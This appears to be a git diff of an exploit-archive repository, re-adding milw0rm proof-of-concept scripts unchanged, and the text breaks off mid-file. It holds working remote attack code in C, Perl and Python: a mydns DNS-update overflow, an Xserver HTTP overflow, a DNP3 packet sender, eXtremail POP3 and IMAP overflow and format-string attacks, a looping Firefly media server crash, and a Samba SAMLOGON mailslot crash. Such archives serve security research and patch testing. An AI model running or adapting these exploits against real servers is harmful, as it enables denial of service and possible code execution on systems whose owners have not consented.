1.1.0 remote exploit PoC\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); - - if (argc <= 2) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_SUCCESS); - } - - printf ("+Attacking to %s...\n", argv[1]); - - printf ("+Building evil query..."); - memset (zbuf, 0x00, sizeof (zbuf)); - zbuffami (zbuf, argv[2]); - printf (" done\n"); - - printf ("+Sending Payload..."); - sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE); - printf (" done\n"); - sleep (1); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2007-04-27] +/* mydns-rr-smash.c + * + * Copyright (c) 2007 by + * + * mydns remote exploit PoC (x86-lnx) + * by mu-b - Apr 2007 + * + * - Tested on: mydns-1.1.0 (.tar.gz) + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; version 2 of the License. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! + */ + +#include +#include +#include +#include +#include +#include + +#define BUF_SIZE 512 +#define NOP 0x41 + +#define DEF_PORT 53 +#define PORT_DNS DEF_PORT + +static void sock_send_udp (u_char * host, int port, u_char * src, int len); +static void zbuffami (u_char * zbuf, u_char *domain); + +static void +sock_send_udp (u_char * host, int port, u_char * src, int len) +{ + struct sockaddr_in address; + struct hostent *hp; + int sock; + + fflush (stdout); + if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1) + { + perror ("socket()"); + exit (-1); + } + + if ((hp = gethostbyname (host)) == NULL) + { + perror ("gethostbyname()"); + exit (-1); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); + address.sin_family = AF_INET; + address.sin_port = htons (port); + + sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address)); +} + +static void +zbuffami (u_char * zbuf, u_char *domain) +{ + u_char *ptr, *bgn, *end; + + ptr = zbuf; + *ptr++ = 0x69; /* transaction id */ + *ptr++ = 0x69; + *ptr++ = 0x28; /* flags */ + *ptr++ = 0x80; + *ptr++ = 0x00; /* number of questions */ + *ptr++ = 0x01; + *ptr++ = 0x00; /* number of answers */ + *ptr++ = 0x01; + *ptr++ = 0x00; /* number of authority rr's */ + *ptr++ = 0x01; + *ptr++ = 0x00; /* number of additional rr's */ + *ptr++ = 0x00; + + /* question */ + bgn = strtok (domain, "."); + while (bgn != NULL) + { + unsigned int len; + + len = strlen (bgn); + *ptr++ = len; + memcpy (ptr, bgn, len); + ptr += len; + + bgn = strtok (NULL, "."); + } + *ptr++ = 0x00; /* terminate name */ + + *ptr++ = 0x00; /* type */ + *ptr++ = 0x06; + *ptr++ = 0xff; /* class */ + *ptr++ = 0xff; + + /* update */ + *ptr++ = 0x00; /* . */ + *ptr++ = 0x00; /* rr->type */ + *ptr++ = 0x00; + *ptr++ = 0x00; /* rr->class */ + *ptr++ = 0x01; + *ptr++ = 0xff; /* rr->ttl */ + *ptr++ = 0xff; + *ptr++ = 0xff; + *ptr++ = 0xff; + *ptr++ = 0xff; /* rr->rdlength */ + *ptr++ = 0xff; + + /* rrdata */ + printf ("NOP: %d\n", BUF_SIZE - (ptr - zbuf)); + memset (ptr, NOP, BUF_SIZE - (ptr - zbuf)); +} + +int +main (int argc, char **argv) +{ + int sock; + u_char zbuf[BUF_SIZE]; + + printf ("mydns <= 1.1.0 remote exploit PoC\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + if (argc <= 2) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + printf ("+Attacking to %s...\n", argv[1]); + + printf ("+Building evil query..."); + memset (zbuf, 0x00, sizeof (zbuf)); + zbuffami (zbuf, argv[2]); + printf (" done\n"); + + printf ("+Sending Payload..."); + sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE); + printf (" done\n"); + sleep (1); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2007-04-27] diff --git a/platforms/linux/dos/4216.pl b/platforms/linux/dos/4216.pl index f76c3d3cc..b1a1b0330 100755 --- a/platforms/linux/dos/4216.pl +++ b/platforms/linux/dos/4216.pl @@ -1,38 +1,38 @@ -#!/usr/bin/perl -# -# _ _ _ -# __| | ___ _ _ ___ ___ ___ _ __ ___| |_ _ __ _ _ ___| |_ -# / _` |/ _ \ | | / __|/ __/ _ \| '_ \/ __| __| '__| | | |/ __| __| -# | (_| | __/ |_| \__ \ (_| (_) | | | \__ \ |_| | | |_| | (__| |_ -# \__,_|\___|\__,_|___/\___\___/|_| |_|___/\__|_| \__,_|\___|\__| -# d.e.u.s..c.o.n.s.t.r.u.c.t -# -# Type -> Proof-of-Concept (P0C) Remote DoS Buffer Overflow -# App -> Xserver 0.1 Alpha -# URL -> http://sourceforge.net/projects/xserver/ -# Found By -> deusconstruct -# -# Stack trace: -# Frame Function Args -# 18FDC978 610DE824 (41414141, 004020E4, 0040202E, 00000000) -# 18FDCD58 004015D4 (41414141, 41414141, 41414141, 41414141) -# -# Usage: perl xserver-dos-poc.pl www.target.com - -use LWP::UserAgent; - -$uniq = LWP::UserAgent->new; -$url = shift or die("Please insert a target domain or IP!"); -$buffer = 150; # Teh evil 0verflow ammount - -print "\n============================\n"; -print "Xserver 0.1 Alpha Remote DoS\n"; -print "DiSc0vEreD by deusconstruct\n"; -print "============================\n"; -print "\n"; -print "[+] Sending evil buffer to $url ...\n"; -$req = HTTP::Request->new(POST => "http://$url/" . A x $buffer); -$res = $uniq->request($req); -print "[+] Evil buffer sent! Enj0y!\n"; - -# milw0rm.com [2007-07-23] +#!/usr/bin/perl +# +# _ _ _ +# __| | ___ _ _ ___ ___ ___ _ __ ___| |_ _ __ _ _ ___| |_ +# / _` |/ _ \ | | / __|/ __/ _ \| '_ \/ __| __| '__| | | |/ __| __| +# | (_| | __/ |_| \__ \ (_| (_) | | | \__ \ |_| | | |_| | (__| |_ +# \__,_|\___|\__,_|___/\___\___/|_| |_|___/\__|_| \__,_|\___|\__| +# d.e.u.s..c.o.n.s.t.r.u.c.t +# +# Type -> Proof-of-Concept (P0C) Remote DoS Buffer Overflow +# App -> Xserver 0.1 Alpha +# URL -> http://sourceforge.net/projects/xserver/ +# Found By -> deusconstruct +# +# Stack trace: +# Frame Function Args +# 18FDC978 610DE824 (41414141, 004020E4, 0040202E, 00000000) +# 18FDCD58 004015D4 (41414141, 41414141, 41414141, 41414141) +# +# Usage: perl xserver-dos-poc.pl www.target.com + +use LWP::UserAgent; + +$uniq = LWP::UserAgent->new; +$url = shift or die("Please insert a target domain or IP!"); +$buffer = 150; # Teh evil 0verflow ammount + +print "\n============================\n"; +print "Xserver 0.1 Alpha Remote DoS\n"; +print "DiSc0vEreD by deusconstruct\n"; +print "============================\n"; +print "\n"; +print "[+] Sending evil buffer to $url ...\n"; +$req = HTTP::Request->new(POST => "http://$url/" . A x $buffer); +$res = $uniq->request($req); +print "[+] Evil buffer sent! Enj0y!\n"; + +# milw0rm.com [2007-07-23] diff --git a/platforms/linux/dos/4347.pl b/platforms/linux/dos/4347.pl index 445e5194f..178c786e4 100755 --- a/platforms/linux/dos/4347.pl +++ b/platforms/linux/dos/4347.pl @@ -1,143 +1,143 @@ -#!/usr/bin/perl -# Automatically generated by beSTORM(tm) -# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $) - -# Attack vector: -# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 - -# Module: -# DNP3 - -use strict; -use warnings; - -use Getopt::Std; -use IO::Socket::INET; - -$SIG{INT} = \&abort; - -my $host = '192.168.4.52'; -my $port = 20000; -my $proto = 'udp'; -my $sockType = SOCK_DGRAM; -my $timeout = 1; - -#Read command line arguments -my %opt; -my $opt_string = 'hH:P:t:'; -getopts( "$opt_string", \%opt ); - -if (defined $opt{h}) { - usage() -} - -$host = $opt{H} ? $opt{H} : $host; -$port = $opt{P} ? $opt{P} : $port; -$timeout = $opt{t} ? $opt{t} : $timeout; - -my @commands = ( -{Command => 'Send', - Data => "\x05\x64\x15\xC2\x01\x00\x00\x00\x00\x00\xC3\xC0\x01\x01\x00". "\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"}, -{Command => 'Receive'}, - -); - -### -# End user configurable part -### - -#1. Create a new connection -my $sock = new IO::Socket::INET ( - PeerAddr => $host, - PeerPort => $port, - Proto => $proto, - Type => $sockType, - Timeout => $timeout, - ) - or die "socket error: $!\n\n"; - -print "connected to: $host:$port\n"; - -$sock->autoflush(1); -binmode $sock; - -#2. communication part - -foreach my $command (@commands) -{ - if ($command->{'Command'} eq 'Receive') - { - my $buf = receive($sock, $timeout); - if (length $buf) - { - print "received: [$buf]\n"; - } - } - elsif ($command->{'Command'} eq 'Send') - { - print "sending: [".$command->{'Data'}."]\n"; - send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n"; - } -} - -#3. Close connection -close ($sock); - -#The end - -sub receive -{ - my $sock = shift; - my $timeout = shift; - - my $tmpbuf; - my $buf = ""; - - while(1) - { # Example from perldoc -f alarm - eval { - local $SIG{ALRM} = sub { die "timeout\n" }; - alarm $timeout; - - my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time. - if ( !defined $ret or $ret == 0 ) - { #EOF - die "timeout\n"; - } - - alarm 0; - $buf .= $tmpbuf; - }; - if ($@) { #time out - if($@ eq "timeout\n") - { - last; - } - else { - die "receive aborted\n"; - } - } - } #while - return $buf; -} - -sub abort -{ - print "aborting...\n"; - if ($sock) - { - close $sock; - } - die "User aborted operation\n"; -} -sub usage -{ - print "usage: $0 [-hHPt]\n"; - print "-h\t: this help message\n"; - print "-H\t: override default host - $host\n"; - print "-P\t: override default port - $port\n"; - print "-t\t: set socket timeout in seconds\n"; - exit 0; -} - -# milw0rm.com [2007-08-31] +#!/usr/bin/perl +# Automatically generated by beSTORM(tm) +# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $) + +# Attack vector: +# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 + +# Module: +# DNP3 + +use strict; +use warnings; + +use Getopt::Std; +use IO::Socket::INET; + +$SIG{INT} = \&abort; + +my $host = '192.168.4.52'; +my $port = 20000; +my $proto = 'udp'; +my $sockType = SOCK_DGRAM; +my $timeout = 1; + +#Read command line arguments +my %opt; +my $opt_string = 'hH:P:t:'; +getopts( "$opt_string", \%opt ); + +if (defined $opt{h}) { + usage() +} + +$host = $opt{H} ? $opt{H} : $host; +$port = $opt{P} ? $opt{P} : $port; +$timeout = $opt{t} ? $opt{t} : $timeout; + +my @commands = ( +{Command => 'Send', + Data => "\x05\x64\x15\xC2\x01\x00\x00\x00\x00\x00\xC3\xC0\x01\x01\x00". "\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"}, +{Command => 'Receive'}, + +); + +### +# End user configurable part +### + +#1. Create a new connection +my $sock = new IO::Socket::INET ( + PeerAddr => $host, + PeerPort => $port, + Proto => $proto, + Type => $sockType, + Timeout => $timeout, + ) + or die "socket error: $!\n\n"; + +print "connected to: $host:$port\n"; + +$sock->autoflush(1); +binmode $sock; + +#2. communication part + +foreach my $command (@commands) +{ + if ($command->{'Command'} eq 'Receive') + { + my $buf = receive($sock, $timeout); + if (length $buf) + { + print "received: [$buf]\n"; + } + } + elsif ($command->{'Command'} eq 'Send') + { + print "sending: [".$command->{'Data'}."]\n"; + send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n"; + } +} + +#3. Close connection +close ($sock); + +#The end + +sub receive +{ + my $sock = shift; + my $timeout = shift; + + my $tmpbuf; + my $buf = ""; + + while(1) + { # Example from perldoc -f alarm + eval { + local $SIG{ALRM} = sub { die "timeout\n" }; + alarm $timeout; + + my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time. + if ( !defined $ret or $ret == 0 ) + { #EOF + die "timeout\n"; + } + + alarm 0; + $buf .= $tmpbuf; + }; + if ($@) { #time out + if($@ eq "timeout\n") + { + last; + } + else { + die "receive aborted\n"; + } + } + } #while + return $buf; +} + +sub abort +{ + print "aborting...\n"; + if ($sock) + { + close $sock; + } + die "User aborted operation\n"; +} +sub usage +{ + print "usage: $0 [-hHPt]\n"; + print "-h\t: this help message\n"; + print "-H\t: override default host - $host\n"; + print "-P\t: override default port - $port\n"; + print "-t\t: set socket timeout in seconds\n"; + exit 0; +} + +# milw0rm.com [2007-08-31] diff --git a/platforms/linux/dos/4532.pl b/platforms/linux/dos/4532.pl index d9b3be24d..417f41060 100755 --- a/platforms/linux/dos/4532.pl +++ b/platforms/linux/dos/4532.pl @@ -1,85 +1,85 @@ -#!/usr/bin/perl -# -# extremail-v3.pl -# -# Copyright (c) 2006 by -# -# eXtremail <=2.1.1 remote root POC (x86-lnx) -# by mu-b - Fri Oct 06 2006 -# -# Tested on: eXtremail 2.1.1 (lnx) -# eXtremail 2.1.0 (lnx) -# -# - Private Source Code -DO NOT DISTRIBUTE - -# http://www.digit-labs.org/ -- Digit-Labs 2006!@$! -######## - -use Getopt::Std; getopts('t:n:u:p:', \%arg); -use Socket; - -&print_header; - -my $target; - -if (defined($arg{'t'})) { $target = $arg{'t'} } -if (!(defined($target))) { &usage; } - -my $pop3_port = 110; -my $send_delay = 1; - -my $NOP = 'A'; - -srand(time()); -while (1) { - if (connect_host($target, $pop3_port)) { - # [0,50) -> [1,50] - $max_len = int(rand(50) + 1); - - # [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1] - $pad1_len = int(rand($max_len * 0.75)); - - # [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2] - $pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1); - - $pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s")); - - $buf = "USER ". - ($NOP x $pad1_len). - ("%s" x $pad2_len). - ($NOP x $pad3_len). - "\n"; - print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf); - send(SOCKET, $buf, 0); - sleep($send_delay); - - close(SOCKET); - } -} - -sub print_header { - print("eXtremail <=2.1.1 remote root POC (x86-lnx)\n"); - print("by: \n"); - print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); -} - -sub usage { - print(qq(Usage: $0 -t - - -t : hostname to test -)); - - exit(1); -} - -sub connect_host { - ($target, $port) = @_; - $iaddr = inet_aton($target) || die("Error: $!\n"); - $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); - $proto = getprotobyname('tcp') || die("Error: $!\n"); - - socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); - connect(SOCKET, $paddr) || die("Error: $!\n"); - return(1338); -} - -# milw0rm.com [2007-10-15] +#!/usr/bin/perl +# +# extremail-v3.pl +# +# Copyright (c) 2006 by +# +# eXtremail <=2.1.1 remote root POC (x86-lnx) +# by mu-b - Fri Oct 06 2006 +# +# Tested on: eXtremail 2.1.1 (lnx) +# eXtremail 2.1.0 (lnx) +# +# - Private Source Code -DO NOT DISTRIBUTE - +# http://www.digit-labs.org/ -- Digit-Labs 2006!@$! +######## + +use Getopt::Std; getopts('t:n:u:p:', \%arg); +use Socket; + +&print_header; + +my $target; + +if (defined($arg{'t'})) { $target = $arg{'t'} } +if (!(defined($target))) { &usage; } + +my $pop3_port = 110; +my $send_delay = 1; + +my $NOP = 'A'; + +srand(time()); +while (1) { + if (connect_host($target, $pop3_port)) { + # [0,50) -> [1,50] + $max_len = int(rand(50) + 1); + + # [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1] + $pad1_len = int(rand($max_len * 0.75)); + + # [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2] + $pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1); + + $pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s")); + + $buf = "USER ". + ($NOP x $pad1_len). + ("%s" x $pad2_len). + ($NOP x $pad3_len). + "\n"; + print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf); + send(SOCKET, $buf, 0); + sleep($send_delay); + + close(SOCKET); + } +} + +sub print_header { + print("eXtremail <=2.1.1 remote root POC (x86-lnx)\n"); + print("by: \n"); + print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); +} + +sub usage { + print(qq(Usage: $0 -t + + -t : hostname to test +)); + + exit(1); +} + +sub connect_host { + ($target, $port) = @_; + $iaddr = inet_aton($target) || die("Error: $!\n"); + $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); + $proto = getprotobyname('tcp') || die("Error: $!\n"); + + socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); + connect(SOCKET, $paddr) || die("Error: $!\n"); + return(1338); +} + +# milw0rm.com [2007-10-15] diff --git a/platforms/linux/dos/4535.pl b/platforms/linux/dos/4535.pl index 99c9ebff5..ac7a7bd77 100755 --- a/platforms/linux/dos/4535.pl +++ b/platforms/linux/dos/4535.pl @@ -1,79 +1,79 @@ -#!/usr/bin/perl -# -# extremail-v8.pl -# -# Copyright (c) 2007 by -# -# eXtremail <=2.1.1 remote PoC -# by mu-b - Wed Jan 31 2007 -# -# Tested on: eXtremail 2.1.1 (lnx) -# eXtremail 2.1.0 (lnx) -# -# - Private Source Code -DO NOT DISTRIBUTE - -# http://www.digit-labs.org/ -- Digit-Labs 2007!@$! -######## - -use Getopt::Std; getopts('t:n:u:p:', \%arg); -use Socket; - -&print_header; - -my $target; - -if (defined($arg{'t'})) { $target = $arg{'t'} } -if (defined($arg{'n'})) { $offset = $arg{'n'} } -if (!(defined($target))) { &usage; } - -my $imapd_port = 143; -my $send_delay = 10; -my $loop = 2; - -my $NOP = 'A'; - -if (connect_host($target, $imapd_port)) { - print("-> * Connected\n"); - sleep(16); - - print("-> * Sending payload\n"); - $buf = "\x00".($NOP x (0x2710-1)); - send(SOCKET, $buf, 0); - sleep($send_delay); - - $buf = $NOP x 0x2710; - while ($loop--) { - print("-> * Sending payload ".$loop."\n"); - send(SOCKET, $buf, 0); - sleep($send_delay); - } - - print("-> * Successfully sent payload!\n"); -} - -sub print_header { - print("eXtremail <=2.1.1 remote PoC\n"); - print("by: \n"); - print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); -} - -sub usage { - print(qq(Usage: $0 -t - - -t : hostname to test -)); - - exit(1); -} - -sub connect_host { - ($target, $port) = @_; - $iaddr = inet_aton($target) || die("Error: $!\n"); - $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); - $proto = getprotobyname('tcp') || die("Error: $!\n"); - - socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); - connect(SOCKET, $paddr) || die("Error: $!\n"); - return(1338); -} - -# milw0rm.com [2007-10-15] +#!/usr/bin/perl +# +# extremail-v8.pl +# +# Copyright (c) 2007 by +# +# eXtremail <=2.1.1 remote PoC +# by mu-b - Wed Jan 31 2007 +# +# Tested on: eXtremail 2.1.1 (lnx) +# eXtremail 2.1.0 (lnx) +# +# - Private Source Code -DO NOT DISTRIBUTE - +# http://www.digit-labs.org/ -- Digit-Labs 2007!@$! +######## + +use Getopt::Std; getopts('t:n:u:p:', \%arg); +use Socket; + +&print_header; + +my $target; + +if (defined($arg{'t'})) { $target = $arg{'t'} } +if (defined($arg{'n'})) { $offset = $arg{'n'} } +if (!(defined($target))) { &usage; } + +my $imapd_port = 143; +my $send_delay = 10; +my $loop = 2; + +my $NOP = 'A'; + +if (connect_host($target, $imapd_port)) { + print("-> * Connected\n"); + sleep(16); + + print("-> * Sending payload\n"); + $buf = "\x00".($NOP x (0x2710-1)); + send(SOCKET, $buf, 0); + sleep($send_delay); + + $buf = $NOP x 0x2710; + while ($loop--) { + print("-> * Sending payload ".$loop."\n"); + send(SOCKET, $buf, 0); + sleep($send_delay); + } + + print("-> * Successfully sent payload!\n"); +} + +sub print_header { + print("eXtremail <=2.1.1 remote PoC\n"); + print("by: \n"); + print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); +} + +sub usage { + print(qq(Usage: $0 -t + + -t : hostname to test +)); + + exit(1); +} + +sub connect_host { + ($target, $port) = @_; + $iaddr = inet_aton($target) || die("Error: $!\n"); + $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); + $proto = getprotobyname('tcp') || die("Error: $!\n"); + + socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); + connect(SOCKET, $paddr) || die("Error: $!\n"); + return(1338); +} + +# milw0rm.com [2007-10-15] diff --git a/platforms/linux/dos/4600.py b/platforms/linux/dos/4600.py index f6e62f983..2337ec161 100755 --- a/platforms/linux/dos/4600.py +++ b/platforms/linux/dos/4600.py @@ -1,38 +1,38 @@ -#!C:\python25\python25.exe - -""" -Advisory : [UPH-07-02] -mt-dappd/Firefly media server remote DoS -Discovered by nnp -http://www.unprotectedhex.com -""" - -import sys -import socket -import time - -if len(sys.argv) != 3: - sys.exit(-1) - -kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n -Authorization:\r\n\r\n""" - -host = sys.argv[1] -port = sys.argv[2] - -print '[+] Host : ' + host -print '[+] Port : ' + port - -print "[+] Sending " -print kill_msg - -ctr = 1 -while 1: - print '[+] Ctr : ' + str(ctr) - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((host, int(port))) - s.send(kill_msg) - s.close() - ctr += 1 - -# milw0rm.com [2007-11-02] +#!C:\python25\python25.exe + +""" +Advisory : [UPH-07-02] +mt-dappd/Firefly media server remote DoS +Discovered by nnp +http://www.unprotectedhex.com +""" + +import sys +import socket +import time + +if len(sys.argv) != 3: + sys.exit(-1) + +kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n +Authorization:\r\n\r\n""" + +host = sys.argv[1] +port = sys.argv[2] + +print '[+] Host : ' + host +print '[+] Port : ' + port + +print "[+] Sending " +print kill_msg + +ctr = 1 +while 1: + print '[+] Ctr : ' + str(ctr) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, int(port))) + s.send(kill_msg) + s.close() + ctr += 1 + +# milw0rm.com [2007-11-02] diff --git a/platforms/linux/dos/4732.c b/platforms/linux/dos/4732.c index 6ee956d8f..cd86c5220 100755 --- a/platforms/linux/dos/4732.c +++ b/platforms/linux/dos/4732.c @@ -1,229 +1,229 @@ -/* http://secunia.com/secunia_research/2007-99/advisory/ - * - * A remote attacker could send a specially crafted "SAMLOGON" domain - * logon packet, possibly leading to the execution of arbitrary code with - * elevated privileges. Note that this vulnerability is exploitable only - * when domain logon support is enabled in Samba. - * - * /////// - * - * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. is left as an exercise to the reader. - * - * laneleb & petemir, a true love in this world! hi! - * - * kangaroo kangaroo... - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -/* smb ripped defines/etc */ - -#define MAX_DGRAM_SIZE 576 -#define MAX_NETBIOSNAME_LEN 16 -typedef char nstring[MAX_NETBIOSNAME_LEN]; -typedef char unstring[MAX_NETBIOSNAME_LEN*4]; -enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3}; - -#define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2))) - -#define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */ -#define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0xFF),CVAL_NC(buf,pos+1)=(unsigned char)((val)>>8)) - -#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val))) -#define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val)) - -/* A netbios name structure. */ -struct nmb_name { - nstring name; - char scope[64]; - unsigned int name_type; -}; - -void safe_strcpy(char *a, char *b, uint32_t size) -{ - strcpy(b, a); -} - -void put_name(char *dest, const char *name, int pad, unsigned int name_type) -{ - size_t len = strlen(name); - - memcpy(dest, name, (len < MAX_NETBIOSNAME_LEN) ? len : MAX_NETBIOSNAME_LEN - 1); - if (len < MAX_NETBIOSNAME_LEN - 1) - { - memset(dest + len, pad, MAX_NETBIOSNAME_LEN - 1 - len); - } - - dest[MAX_NETBIOSNAME_LEN - 1] = name_type; -} - -int put_nmb_name(char *buf,int offset,struct nmb_name *name) -{ - int ret,m; - nstring buf1; - char *p; - - if (strcmp(name->name,"*") == 0) - { - /* special case for wildcard name */ - put_name(buf1, "*", '\0', name->name_type); - } - else - { - put_name(buf1, name->name, ' ', name->name_type); - } - - buf[offset] = 0x20; - - ret = 34; - - for (m=0;m>4)&0xF); - buf[offset+2+2*m] = 'A' + (buf1[m]&0xF); - } - offset += 33; - - buf[offset] = 0; - - if (name->scope[0]) - { - /* XXXX this scope handling needs testing */ - ret += strlen(name->scope) + 1; - safe_strcpy(&buf[offset+1],name->scope,sizeof(name->scope)); - - p = &buf[offset+1]; - while ((p = strchr(p,'.'))) - { - buf[offset] = PTR_DIFF(p,&buf[offset+1]); - offset += (buf[offset] + 1); - p = &buf[offset+1]; - } - buf[offset] = strlen(&buf[offset+1]); - } - - return(ret); -} - -typedef struct exudp_s -{ - unsigned char msg_type; - unsigned char flags; - uint16_t dgm_id; - uint32_t source_ip; - uint16_t source_port; - uint16_t dgm_len; - uint16_t pOffset; - struct nmb_name source_name; - struct nmb_name dest_name; -} exudp; - -/* code */ - -int send_udp(int ip, char *packet, unsigned int packetSize) -{ - int fd; - struct sockaddr_in to; - int len; - - if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) - return 0; - - to.sin_family = AF_INET; - to.sin_addr.s_addr = ip; - to.sin_port = htons(138); - - if( (len = sendto(fd, packet, packetSize, 0, (struct sockaddr *)&to, sizeof(struct sockaddr_in))) < 0) - { - perror("sendto"); - return 0; - } - - return len; -} - -int main(int argc, char *argv[]) -{ - unsigned char samlogon[10240]; - unsigned int nlOffset; - exudp dgPacket; - - printf("smb_mailslot() POC by asmx86@gmail.com\n\n"); - - if(argc < 3) - { - printf("Usage: %s \n\n", argv[0]); - exit(1); - } - - if(strlen(argv[1]) > 15) - { - printf("[!] netbios victim's name too long\n"); - exit(1); - } - - memset(samlogon, 0, sizeof(samlogon)); - - dgPacket.msg_type = 0x11; - dgPacket.flags = 1; - dgPacket.dgm_id = 0xdead; - dgPacket.source_ip = 0xdeadbeef; - dgPacket.source_port = 0xc0fe; - dgPacket.dgm_len = 0; - dgPacket.pOffset = 0; - - strcpy(dgPacket.source_name.name, "ASMX86@GMAILCOM"); - strcpy(dgPacket.dest_name.name, argv[1]); - - nlOffset = 14; - - nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.source_name); - nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.dest_name); - -#define OFFSET 97 - - nlOffset -= 4; - SCVAL(samlogon, nlOffset+4, 0); - SSVAL(samlogon, nlOffset+4+OFFSET, 18); - SCVAL(samlogon, nlOffset+7, 0); - SCVAL(samlogon, nlOffset+8, 0x25); - SSVAL(samlogon, nlOffset+59, 397); - - SSVAL(samlogon, nlOffset+61, OFFSET); - - SSVAL(samlogon, nlOffset+63, 0); - - SSVAL(samlogon, nlOffset+36, 12); - memcpy(&samlogon[nlOffset+39+(12*2)], "\\MAILSLOT\\NET\\NTLOGON", 21); - - memcpy(&samlogon[nlOffset+4+OFFSET+4], "\x41\x00\x41\x00\x00\x00", 6); - memcpy(&samlogon[nlOffset+4+OFFSET+4+6-1], "\x42\x00\x42\x00\x00\x00", 6); - memset(&samlogon[nlOffset+4+OFFSET+4+6+6], '\x43', 260); //play with this value ;) - - nlOffset = 576; - - dgPacket.dgm_len = nlOffset - 14; - dgPacket.dgm_len = htons(dgPacket.dgm_len); - - memcpy(&samlogon, &dgPacket, 14); - - if(!send_udp(inet_addr(argv[2]), samlogon, nlOffset)) - fprintf(stderr, "[!] Error sending UDP packet\n"); - else - fprintf(stderr, "[*] packet sent\n"); - - return 0; -} -//eof - -// milw0rm.com [2007-12-14] +/* http://secunia.com/secunia_research/2007-99/advisory/ + * + * A remote attacker could send a specially crafted "SAMLOGON" domain + * logon packet, possibly leading to the execution of arbitrary code with + * elevated privileges. Note that this vulnerability is exploitable only + * when domain logon support is enabled in Samba. + * + * /////// + * + * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. is left as an exercise to the reader. + * + * laneleb & petemir, a true love in this world! hi! + * + * kangaroo kangaroo... + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* smb ripped defines/etc */ + +#define MAX_DGRAM_SIZE 576 +#define MAX_NETBIOSNAME_LEN 16 +typedef char nstring[MAX_NETBIOSNAME_LEN]; +typedef char unstring[MAX_NETBIOSNAME_LEN*4]; +enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3}; + +#define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2))) + +#define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */ +#define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0xFF),CVAL_NC(buf,pos+1)=(unsigned char)((val)>>8)) + +#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val))) +#define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val)) + +/* A netbios name structure. */ +struct nmb_name { + nstring name; + char scope[64]; + unsigned int name_type; +}; + +void 